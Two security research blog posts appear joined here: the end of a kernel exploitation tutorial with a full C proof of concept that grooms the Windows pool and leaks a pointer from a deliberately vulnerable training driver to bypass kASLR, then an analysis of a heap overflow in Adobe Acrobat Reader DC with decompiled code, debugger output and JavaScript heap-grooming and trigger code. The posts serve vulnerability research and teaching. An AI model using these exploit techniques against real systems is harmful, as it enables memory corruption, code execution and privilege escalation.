However, slightly easier because we can use the source code, let’s find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is of type FunctionCallback and is defined as such in Common.h: typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which a function located in UseAfterFreeNonPagedPoolNx.c shown two images ago! This means a member of this structure will contain a function pointer within HEVD, a kernel mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true, the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated adjacent to any free slots within the page our event objects live! Let’s update our POC to perform the following:

Free every other event object
Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object

Using the memcpy routine (RtlCopyMemory) from the original routine for the out-of-bounds read IOCTL invocation into the vulnerable pool chunk, we can inspect the target pool chunk used in the copy operation, which will be the chunk bubbled back up to user mode, which could showcase that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent with the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry to us because the vulnerability allows us to specify how much of the data from the adjacent chunks we would like to return to user mode anyways. This means we could specify an arbitrary amount, such as 0x1000, and that is how many bytes would be returned from the adjacent chunks.

Since there are many chunks which are adjacent, it will result in an information leak. The reason for this is because the kLFH has a bit of “funkiness” going on. This isn’t necessarily due to any sort of kLFH “randomization”, I found out after talking with my colleague Yarden Shafir, where the free chunks will be/where the allocations will occur, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly. This is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:

VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX

Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

Free the rest of the event objects
Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don’t want to perform 2500 DeviceIoControl calls, as there is potential for the one of the last memory address in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and if our vulnerable object is at the end of the last valid page for the pool, it will try reading from the address 0x1000 bytes away, which may reside in a page which is not currently committed to memory, causing a DOS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in an adjacent block to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.

After freeing the event objects and reading back data from adjacent chunks, a for loop is instituted to parse the output for anything that is sign extended (a kernel-mode address). Since the output buffer will be returned in an unsigned long long array, the size of a 64-bit address, and since the address we want to leak from is the first member of the adjacent chunk, after the leaked _POOL_HEADER, it should be placed into a clean 64-bit variable, and therefore easily parsed. Once we have leaked the address of the pointer to the function, we then can calculate the distance from the function to the base of HEVD, add the distance, and then obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks both have Hack tags. However, if we take the adjacent chunk to the current chunk, which is a vulnerable chunk we can read past and denoted by an asterisk, and after parsing it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can see clearly that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD, and update our code accordingly. We can see the distance is 0x880cc, so adding this to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
{
  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i <= 5000; i++)
  {
    // Create the objects
    HANDLE tempHandle = CreateEventA(
      NULL,
      FALSE,
      FALSE,
      NULL
    );

    // Assign the handles to the array
    eventObjects[i] = tempHandle;
  }

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
  {
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i <= 5000; i += 2)
    {
      BOOL tempHandle1 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
      {
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)
    {
      DeviceIoControl(
        driverHandle,
        0x00222053,
        NULL,
        0,
        NULL,
        0,
        &bytesReturned,
        NULL
      );
    }

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i <= 5000; i += 2)
    {
      BOOL tempHandle2 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
      {
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i <= 100; i++)
    {
      // Return buffer
      DWORD bytesReturned1;

      DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned1,
        NULL
      );

    }

    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i <= 100; i++)
    {
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
      {
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] + 0x880CC;
        break;
      }
    }
  }
}

void main(void)
{
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver",
    GENERIC_READ | GENERIC_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (drvHandle == (HANDLE)-1)
  {
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    memLeak(drvHandle);
  }
}

Conclusion

Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

Exodus Intelligence

Exodus Intel VRT

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution.

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

Address Space Layout Randomization (ASLR)
Data Execution Prevention (DEP)
Control Flow Guard (CFG)
Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

